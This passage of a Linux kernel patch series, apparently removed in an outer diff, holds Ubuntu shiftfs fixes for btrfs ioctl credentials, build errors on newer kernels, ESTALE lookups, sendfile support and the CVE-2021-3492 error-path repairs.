--		cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
--		sbinfo->creator_cred = cred_tmp;
- 	} else {
- 		/*
- 		 * This leg executes if we're admin capable in the namespace,
--- 
-2.39.2
-
-From 485977eb4fb2701211275d28ca4fdbec87704a18 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Wed, 20 May 2020 13:44:27 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: let userns root destroy subvolumes
- from other users
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1879688
-
-Stéphane reported a bug found during NorthSec that makes heavy use of
-shiftfs. When a subvolume or snapshot is created as userns root in the
-container and then chowned to another user a delete as the root user
-will fail. The reason for this is that we drop all capabilities as a
-safety measure before calling btrfs ioctls. The only workable fix I
-could think of is to retain the CAP_DAC_OVERRIDE capability for the
-BTRFS_IOC_SNAP_DESTROY ioctl. All other solutions would be way more
-invasive.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Cc: Seth Forshee <seth.forshee@canonical.com>
-Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 14 ++++++++++++--
- 1 file changed, 12 insertions(+), 2 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 5c39529d0a17..5d88193b41db 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1356,7 +1356,7 @@ static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len,
- 	return ret;
- }
- 
--static int shiftfs_override_ioctl_creds(const struct super_block *sb,
-+static int shiftfs_override_ioctl_creds(int cmd, const struct super_block *sb,
- 					const struct cred **oldcred,
- 					struct cred **newcred)
- {
-@@ -1381,6 +1381,16 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
- 	cap_clear((*newcred)->cap_inheritable);
- 	cap_clear((*newcred)->cap_permitted);
- 
-+	if (cmd == BTRFS_IOC_SNAP_DESTROY) {
-+		kuid_t kuid_root = make_kuid(sb->s_user_ns, 0);
-+		/*
-+		 * Allow the root user in the container to remove subvolumes
-+		 * from other users.
-+		 */
-+		if (uid_valid(kuid_root) && uid_eq(fsuid, kuid_root))
-+			cap_raise((*newcred)->cap_effective, CAP_DAC_OVERRIDE);
-+	}
-+
- 	put_cred(override_creds(*newcred));
- 	return 0;
- }
-@@ -1513,7 +1523,7 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- 	if (ret)
- 		goto out_restore;
- 
--	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
-+	ret = shiftfs_override_ioctl_creds(cmd, sb, &oldcred, &newcred);
- 	if (ret)
- 		goto out_fdput;
- 
--- 
-2.39.2
-
-From e090464bdd744306b3b766b2a675ee26e934f1ef Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Mon, 15 Jun 2020 15:16:11 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs -- Fix build errors from missing
- fiemap definitions
-Cc: mpagano@gentoo.org
-
-shiftfs FTBFS with 5.8-rc1:
-
- /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c: In function 'shiftfs_fiemap':
- /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c:731:13: error: dereferencing pointer to incomplete type 'struct fiemap_extent_info'
- /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c:731:26: error: 'FIEMAP_FLAG_SYNC' undeclared (first use in this function); did you mean 'FS_XFLAG_SYNC'?
-
-It seems that shiftfs was getting linux/fiemap.h included
-indirectly before. Include it directly.
-
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 5d88193b41db..f9a5c94a9793 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -20,6 +20,7 @@
- #include <linux/posix_acl.h>
- #include <linux/posix_acl_xattr.h>
- #include <linux/uio.h>
-+#include <linux/fiemap.h>
- 
- struct shiftfs_super_info {
- 	struct vfsmount *mnt;
--- 
-2.39.2
-
-From 436cc946e1acb3833c41e6a7df3239f5f559369a Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Tue, 23 Jun 2020 19:46:16 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent ESTALE for LOOKUP_JUMP
- lookups
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1872757
-
-Users reported that creating temporary files shiftfs reports ESTALE.
-This can be reproduced via:
-
-import tempfile
-import os
-
-def test():
-    with tempfile.TemporaryFile() as fd:
-        fd.write("data".encode('utf-8'))
-        # re-open the file to get a read-only file descriptor
-        return open(f"/proc/self/fd/{fd.fileno()}", "r")
-
-def main():
-   fd = test()
-   fd.close()
-
-if __name__ == "__main__":
-    main()
-
-a similar issue was reported here:
-https://github.com/systemd/systemd/issues/14861
-
-Our revalidate methods were very opinionated about whether or not a
-lower dentry was valid especially when it became unlinked we simply
-invalidated the lower dentry which caused above bug to surface. This has
-led to bugs where a ESTALE was returned for e.g.  temporary files that
-were created and directly re-opened afterwards through
-/proc/<pid>/fd/<nr-of-deleted-file>. When a file is re-opened through
-/proc/<pid>/fd/<nr> LOOKUP_JUMP is set and the vfs will revalidate via
-d_weak_revalidate(). Since the file has been unhashed or even already
-gone negative we'd fail the open when we should've succeeded.
-
-Reported-by: Christian Kellner <ckellner@redhat.com>
-Reported-by: Evgeny Vereshchagin <evvers@ya.ru>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Cc: Seth Forshee <seth.forshee@canonical.com>
-Link: https://github.com/systemd/systemd/issues/14861
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 4 ----
- 1 file changed, 4 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index f9a5c94a9793..3cfd1881e9a2 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -252,8 +252,6 @@ static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
- 		struct inode *loweri = d_inode(lowerd);
- 
- 		shiftfs_copyattr(loweri, inode);
--		if (!inode->i_nlink)
--			err = 0;
- 	}
- 
- 	return err;
-@@ -279,8 +277,6 @@ static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
- 		struct inode *loweri = d_inode(lowerd);
- 
- 		shiftfs_copyattr(loweri, inode);
--		if (!inode->i_nlink)
--			err = 0;
- 	}
- 
- 	return err;
--- 
-2.39.2
-
-From 21c3ebac069050649a03a1e9d5f2fd4c895fc6cd Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Wed, 30 Dec 2020 11:10:20 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix build error with 5.11
-Cc: mpagano@gentoo.org
-
-After commit:
-
- 8760c909f54a82aaa6e76da19afe798a0c77c3c3 ("file: Rename __close_fd to close_fd and remove the files parameter")
-
-__close_fd() has been renamed to close_fd() and the files parameter has
-been removed.
-
-Change the shiftfs code to properly support this change.
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 3cfd1881e9a2..4f1d94903557 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1420,7 +1420,7 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
- 	else
- 		ret = copy_to_user(arg, v2, sizeof(*v2));
- 
--	__close_fd(current->files, fd);
-+	close_fd(fd);
- 	kfree(v1);
- 	kfree(v2);
- 
-@@ -1468,7 +1468,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 	/*
- 	 * shiftfs_real_fdget() does not take a reference to lfd.file, so
- 	 * take a reference here to offset the one which will be put by
--	 * __close_fd(), and make sure that reference is put on fdput(lfd).
-+	 * close_fd(), and make sure that reference is put on fdput(lfd).
- 	 */
- 	get_file(lfd.file);
- 	lfd.flags |= FDPUT_FPUT;
--- 
-2.39.2
-
-From c0ebd52879a8805e07e59a25e72bce73e2ddcd90 Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Fri, 9 Apr 2021 13:01:06 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: free allocated memory in
- shiftfs_btrfs_ioctl_fd_replace() error paths
-Cc: mpagano@gentoo.org
-
-Many error paths in shiftfs_btrfs_ioctl_fd_replace() do not free memory
-allocated near the top of the function. Fix up these error paths to free
-the memory.
-
-Additionally, the addresses for the allocated memory are assigned to
-return parameters early in the function, before we know whether or not
-the function as a whole will return success. Wait to assign these values
-until we know the function was successful, and for good measure
-initialize the return parameters to NULL at the start.
-
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-CVE-2021-3492
-Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 28 +++++++++++++++++++++-------
- 1 file changed, 21 insertions(+), 7 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 4f1d94903557..8eab93691d62 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1438,6 +1438,9 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 	struct btrfs_ioctl_vol_args *v1 = NULL;
- 	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
- 
-+	*b1 = NULL;
-+	*b2 = NULL;
-+
- 	if (!is_btrfs_snap_ioctl(cmd))
- 		return 0;
- 
-@@ -1446,23 +1449,23 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 		if (IS_ERR(v1))
- 			return PTR_ERR(v1);
- 		oldfd = v1->fd;
--		*b1 = v1;
- 	} else {
- 		v2 = memdup_user(arg, sizeof(*v2));
- 		if (IS_ERR(v2))
- 			return PTR_ERR(v2);
- 		oldfd = v2->fd;
--		*b2 = v2;
- 	}
- 
- 	src = fdget(oldfd);
--	if (!src.file)
--		return -EINVAL;
-+	if (!src.file) {
-+		ret = -EINVAL;
-+		goto err_free;
-+	}
- 
- 	ret = shiftfs_real_fdget(src.file, &lfd);
- 	if (ret) {
- 		fdput(src);
--		return ret;
-+		goto err_free;
- 	}
- 
- 	/*
-@@ -1477,7 +1480,8 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 	*newfd = get_unused_fd_flags(lfd.file->f_flags);
- 	if (*newfd < 0) {
- 		fdput(lfd);
--		return *newfd;
-+		ret = *newfd;
-+		goto err_free;
- 	}
- 
- 	fd_install(*newfd, lfd.file);
-@@ -1492,8 +1496,18 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 		v2->fd = oldfd;
- 	}
- 
--	if (ret)
-+	if (!ret) {
-+		*b1 = v1;
-+		*b2 = v2;
-+	} else {
- 		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
-+	}
-+
-+	return ret;
-+
-+err_free:
-+	kfree(v1);
-+	kfree(v2);
- 
- 	return ret;
- }
--- 
-2.39.2
-
-From f0a7637da44fdf17351c0ba4c3f616941c749f57 Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Fri, 9 Apr 2021 13:10:37 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: handle copy_to_user() return values
- correctly
-Cc: mpagano@gentoo.org
-
-shiftfs expects copy_to_user() to return a negative error code on
-failure, when it actually returns the amount of uncopied data. Fix all
-code using copy_to_user() to handle the return values correctly.
-
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-CVE-2021-3492
-Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 8eab93691d62..abeb7db3b9be 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1424,7 +1424,7 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
- 	kfree(v1);
- 	kfree(v2);
- 
--	return ret;
-+	return ret ? -EFAULT: 0;
- }
- 
- static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
-@@ -1501,6 +1501,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 		*b2 = v2;
- 	} else {
- 		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
-+		ret = -EFAULT;
- 	}
- 
- 	return ret;
--- 
-2.39.2
-
-From d2e7abdd84fb28842c61ffd7128977f29518e4ef Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Mon, 9 Aug 2021 17:15:28 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix sendfile() invocations
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1939301
-
-Upstream commit 36e2c7421f02 ("fs: don't allow splice read/write without explicit ops")
-caused a regression for us. It states:
-
-> default_file_splice_write is the last piece of generic code that uses
-> set_fs to make the uaccess routines operate on kernel pointers.  It
-> implements a "fallback loop" for splicing from files that do not actually
-> provide a proper splice_read method.  The usual file systems and other
-> high bandwidth instances all provide a ->splice_read, so this just removes
-> support for various device drivers and procfs/debugfs files.  If splice
-> support for any of those turns out to be important it can be added back
-> by switching them to the iter ops and using generic_file_splice_read.
-
-this means that currently all workloads making use of sendfile() on
-shiftfs fail. This includes LXD, Anbox and a range of others. Fix this
-by providing explicit .splice_read() and .splice_write() methods which
-jus restores the status quo and we keep using a generic method provided
-by the vfs.
-
-Cc: Seth Forshee <sforshee@kernel.org>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Paolo Pisati <paolo.pisati@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index abeb7db3b9be..f5f6d8d8144e 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1737,6 +1737,8 @@ const struct file_operations shiftfs_file_operations = {
- 	.compat_ioctl		= shiftfs_compat_ioctl,
- 	.copy_file_range	= shiftfs_copy_file_range,
- 	.remap_file_range	= shiftfs_remap_file_range,
-+	.splice_read		= generic_file_splice_read,
-+	.splice_write		= iter_file_splice_write,
- };
- 
- const struct file_operations shiftfs_dir_operations = {
--- 
-2.39.2
-
-From ff28712d9e52b3b0b2127e9898b96f7c1e11bd26 Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Thu, 20 Jan 2022 16:55:24 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support kernel 5.15
-Cc: mpagano@gentoo.org
-
-WARNING: after this change we may see some regressions if shiftfs is
-used with filesystem namespaces.
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 107 ++++++++++++++++++++++++++++++---------------------
- 1 file changed, 64 insertions(+), 43 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index f5f6d8d8144e..76c54bc12018 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -308,7 +308,8 @@ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
- 	return p;
- }
- 
--static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
-+static int shiftfs_setxattr(struct user_namespace *ns,
-+			    struct dentry *dentry, struct inode *inode,
- 			    const char *name, const void *value,
- 			    size_t size, int flags)
- {
-@@ -317,7 +318,7 @@ static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
- 	const struct cred *oldcred;
- 
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = vfs_setxattr(lowerd, name, value, size, flags);
-+	err = vfs_setxattr(ns, lowerd, name, value, size, flags);
- 	revert_creds(oldcred);
- 
- 	shiftfs_copyattr(lowerd->d_inode, inode);
-@@ -334,7 +335,7 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
- 	const struct cred *oldcred;
- 
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = vfs_getxattr(lowerd, name, value, size);
-+	err = vfs_getxattr(&init_user_ns, lowerd, name, value, size);
- 	revert_creds(oldcred);
- 
- 	return err;
-@@ -354,14 +355,15 @@ static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
- 	return err;
- }
- 
--static int shiftfs_removexattr(struct dentry *dentry, const char *name)
-+static int shiftfs_removexattr(struct user_namespace *ns,
-+			       struct dentry *dentry, const char *name)
- {
- 	struct dentry *lowerd = dentry->d_fsdata;
- 	int err;
- 	const struct cred *oldcred;
- 
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = vfs_removexattr(lowerd, name);
-+	err = vfs_removexattr(ns, lowerd, name);
- 	revert_creds(oldcred);
- 
- 	/* update c/mtime */
-@@ -371,13 +373,14 @@ static int shiftfs_removexattr(struct dentry *dentry, const char *name)
- }
- 
- static int shiftfs_xattr_set(const struct xattr_handler *handler,
-+			     struct user_namespace *ns,
- 			     struct dentry *dentry, struct inode *inode,
- 			     const char *name, const void *value, size_t size,
- 			     int flags)
- {
- 	if (!value)
--		return shiftfs_removexattr(dentry, name);
--	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
-+		return shiftfs_removexattr(ns, dentry, name);
-+	return shiftfs_setxattr(ns, dentry, inode, name, value, size, flags);
- }
- 
- static int shiftfs_inode_test(struct inode *inode, void *data)
-@@ -391,7 +394,8 @@ static int shiftfs_inode_set(struct inode *inode, void *data)
- 	return 0;
- }
- 
--static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
-+static int shiftfs_create_object(struct user_namespace *ns,
-+				 struct inode *diri, struct dentry *dentry,
- 				 umode_t mode, const char *symlink,
- 				 struct dentry *hardlink, bool excl)
- {
-@@ -453,7 +457,7 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
- 		inode->i_state |= I_CREATING;
- 		spin_unlock(&inode->i_lock);
- 
--		inode_init_owner(inode, diri, mode);
-+		inode_init_owner(ns, inode, diri, mode);
- 		modei = inode->i_mode;
- 	}
- 
-@@ -464,22 +468,22 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
- 
- 	if (hardlink) {
- 		lowerd_link = hardlink->d_fsdata;
--		err = vfs_link(lowerd_link, loweri_dir, lowerd_new, NULL);
-+		err = vfs_link(lowerd_link, ns, loweri_dir, lowerd_new, NULL);
- 	} else {
- 		switch (modei & S_IFMT) {
- 		case S_IFDIR:
--			err = vfs_mkdir(loweri_dir, lowerd_new, modei);
-+			err = vfs_mkdir(ns, loweri_dir, lowerd_new, modei);
- 			break;
- 		case S_IFREG:
--			err = vfs_create(loweri_dir, lowerd_new, modei, excl);
-+			err = vfs_create(ns, loweri_dir, lowerd_new, modei, excl);
- 			break;
- 		case S_IFLNK:
--			err = vfs_symlink(loweri_dir, lowerd_new, symlink);
-+			err = vfs_symlink(ns, loweri_dir, lowerd_new, symlink);
- 			break;
- 		case S_IFSOCK:
- 			/* fall through */
- 		case S_IFIFO:
--			err = vfs_mknod(loweri_dir, lowerd_new, modei, 0);
-+			err = vfs_mknod(ns, loweri_dir, lowerd_new, modei, 0);
- 			break;
- 		default:
- 			err = -EINVAL;
-@@ -535,41 +539,43 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
- 	return err;
- }
- 
--static int shiftfs_create(struct inode *dir, struct dentry *dentry,
-+static int shiftfs_create(struct user_namespace *ns,
-+			  struct inode *dir, struct dentry *dentry,
- 			  umode_t mode,  bool excl)
- {
- 	mode |= S_IFREG;
- 
--	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
-+	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, excl);
- }
- 
--static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
-+static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
- 			 umode_t mode)
- {
- 	mode |= S_IFDIR;
- 
--	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
-+	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
- }
- 
- static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
- 			struct dentry *dentry)
- {
--	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
-+	return shiftfs_create_object(&init_user_ns, dir, dentry, 0, NULL, hardlink, false);
- }
- 
--static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode,
-+static int shiftfs_mknod(struct user_namespace *ns,
-+			 struct inode *dir, struct dentry *dentry, umode_t mode,
- 			 dev_t rdev)
- {
- 	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
- 		return -EPERM;
- 
--	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
-+	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
- }
- 
--static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
-+static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
- 			   const char *symlink)
- {
--	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
-+	return shiftfs_create_object(ns, dir, dentry, S_IFLNK, symlink, NULL, false);
- }
- 
- static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
-@@ -584,9 +590,9 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
- 	inode_lock_nested(loweri, I_MUTEX_PARENT);
- 	if (rmdir)
--		err = vfs_rmdir(loweri, lowerd);
-+		err = vfs_rmdir(&init_user_ns, loweri, lowerd);
- 	else
--		err = vfs_unlink(loweri, lowerd, NULL);
-+		err = vfs_unlink(&init_user_ns, loweri, lowerd, NULL);
- 	revert_creds(oldcred);
- 
- 	if (!err) {
-@@ -615,7 +621,8 @@ static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry)
- 	return shiftfs_rm(dir, dentry, true);
- }
- 
--static int shiftfs_rename(struct inode *olddir, struct dentry *old,
-+static int shiftfs_rename(struct user_namespace *ns,
-+			  struct inode *olddir, struct dentry *old,
- 			  struct inode *newdir, struct dentry *new,
- 			  unsigned int flags)
- {
-@@ -625,6 +632,14 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
- 		      *trapd;
- 	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
- 		     *loweri_dir_new = lowerd_dir_new->d_inode;
-+	struct renamedata rd = {
-+		.old_mnt_userns	= ns,
-+		.old_dir	= loweri_dir_old,
-+		.old_dentry	= lowerd_old,
-+		.new_mnt_userns	= ns,
-+		.new_dir	= loweri_dir_new,
-+		.new_dentry	= lowerd_new,
-+	};
- 	int err = -EINVAL;
- 	const struct cred *oldcred;
- 
-@@ -634,8 +649,7 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
- 		goto out_unlock;
- 
- 	oldcred = shiftfs_override_creds(old->d_sb);
--	err = vfs_rename(loweri_dir_old, lowerd_old, loweri_dir_new, lowerd_new,
--			 NULL, flags);
-+	err = vfs_rename(&rd);
- 	revert_creds(oldcred);
- 
- 	shiftfs_copyattr(loweri_dir_old, olddir);
-@@ -691,7 +705,7 @@ static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
- 	return d_splice_alias(inode, dentry);
- }
- 
--static int shiftfs_permission(struct inode *inode, int mask)
-+static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, int mask)
- {
- 	int err;
- 	const struct cred *oldcred;
-@@ -702,12 +716,12 @@ static int shiftfs_permission(struct inode *inode, int mask)
- 		return -ECHILD;
- 	}
- 
--	err = generic_permission(inode, mask);
-+	err = generic_permission(ns, inode, mask);
- 	if (err)
- 		return err;
- 
- 	oldcred = shiftfs_override_creds(inode->i_sb);
--	err = inode_permission(loweri, mask);
-+	err = inode_permission(ns, loweri, mask);
- 	revert_creds(oldcred);
- 
- 	return err;
-@@ -733,7 +747,8 @@ static int shiftfs_fiemap(struct inode *inode,
- 	return err;
- }
- 
--static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
-+static int shiftfs_tmpfile(struct user_namespace *ns,
-+			   struct inode *dir, struct dentry *dentry,
- 			   umode_t mode)
- {
- 	int err;
-@@ -745,13 +760,13 @@ static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
- 		return -EOPNOTSUPP;
- 
- 	oldcred = shiftfs_override_creds(dir->i_sb);
--	err = loweri->i_op->tmpfile(loweri, lowerd, mode);
-+	err = loweri->i_op->tmpfile(ns, loweri, lowerd, mode);
- 	revert_creds(oldcred);
- 
- 	return err;
- }
- 
--static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
-+static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, struct iattr *attr)
- {
- 	struct dentry *lowerd = dentry->d_fsdata;
- 	struct inode *loweri = lowerd->d_inode;
-@@ -761,7 +776,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 	int err;
- 
--	err = setattr_prepare(dentry, attr);
-+	err = setattr_prepare(ns, dentry, attr);
- 	if (err)
- 		return err;
- 
-@@ -778,7 +793,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 
- 	inode_lock(loweri);
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = notify_change(lowerd, &newattr, NULL);
-+	err = notify_change(ns, lowerd, &newattr, NULL);
- 	revert_creds(oldcred);
- 	inode_unlock(loweri);
- 
-@@ -787,7 +802,8 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 	return err;
- }
- 
--static int shiftfs_getattr(const struct path *path, struct kstat *stat,
-+static int shiftfs_getattr(struct user_namespace *ns,
-+			   const struct path *path, struct kstat *stat,
- 			   u32 request_mask, unsigned int query_flags)
- {
- 	struct inode *inode = path->dentry->d_inode;
-@@ -870,9 +886,9 @@ shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
- 			entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid));
- 			break;
- 		case ACL_GROUP:
--			kgid = make_kgid(&init_user_ns, le32_to_cpu(entry->e_id));
-+			kgid = make_kgid(from, le32_to_cpu(entry->e_id));
- 			kgid = shift_kgid(from, to, kgid);
--			entry->e_id = cpu_to_le32(from_kgid(&init_user_ns, kgid));
-+			entry->e_id = cpu_to_le32(from_kgid(from, kgid));
- 			break;
- 		default:
- 			break;
-@@ -880,7 +896,8 @@ shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
- 	}
- }
- 
--static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
-+static struct posix_acl *
-+shiftfs_get_acl(struct inode *inode, int type, bool rcu)
- {
- 	struct inode *loweri = inode->i_private;
- 	const struct cred *oldcred;
-@@ -890,6 +907,9 @@ static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
- 	int size;
- 	int err;
- 
-+	if (rcu)
-+		return ERR_PTR(-ECHILD);
-+
- 	if (!IS_POSIXACL(loweri))
- 		return NULL;
- 
-@@ -941,6 +961,7 @@ shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler,
- 
- static int
- shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
-+			    struct user_namespace *ns,
- 			    struct dentry *dentry, struct inode *inode,
- 			    const char *name, const void *value,
- 			    size_t size, int flags)
-@@ -952,17 +973,17 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
- 		return -EOPNOTSUPP;
- 	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
- 		return value ? -EACCES : 0;
--	if (!inode_owner_or_capable(inode))
-+	if (!inode_owner_or_capable(ns, inode))
- 		return -EPERM;
- 
- 	if (value) {
- 		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
- 				    loweri->i_sb->s_user_ns,
- 				    (void *)value, size);
--		err = shiftfs_setxattr(dentry, inode, handler->name, value,
-+		err = shiftfs_setxattr(ns, dentry, inode, handler->name, value,
- 				       size, flags);
- 	} else {
--		err = shiftfs_removexattr(dentry, handler->name);
-+		err = shiftfs_removexattr(ns, dentry, handler->name);
- 	}
- 
- 	if (!err)
--- 
-2.39.2
-
-From df4546ab77323af5bd40996244af7ade6c99054b Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Wed, 13 Apr 2022 15:26:22 +0200
